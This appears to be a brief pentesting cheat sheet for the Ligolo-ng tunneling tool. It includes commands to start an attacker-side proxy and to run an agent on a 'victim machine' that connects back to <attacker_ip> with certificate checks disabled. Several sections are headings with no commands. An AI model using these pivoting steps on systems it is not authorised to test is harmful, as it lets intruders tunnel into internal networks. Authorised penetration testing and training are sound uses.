Lingolo-ng

Basic Configuration

Create a connection

Proxy machine

Start the Lingolo proxy with a self-signed certificate on attacker machine with root privileges.

sudo proxy --selfcert

Agent machine

Run the agent on the victim machine to connect to the Lingolo proxy.

./agent.exe --connect <attacker_ip>:<proxy_port> --ignore-cert

Network Configuration

After the agent successfully connects, select the session.

session

Start the network interface

Create a network interface on the proxy's machine.

tunnel_start --tun ligolo

Add a new routing

List available interfaces on the agent.

Add a route to the internal interface.

Port Forward Listeners

Add a Listener.

List Active Listeners.

Stop a Listener.

Delete interface

list interfaces

Delete interface

Last updated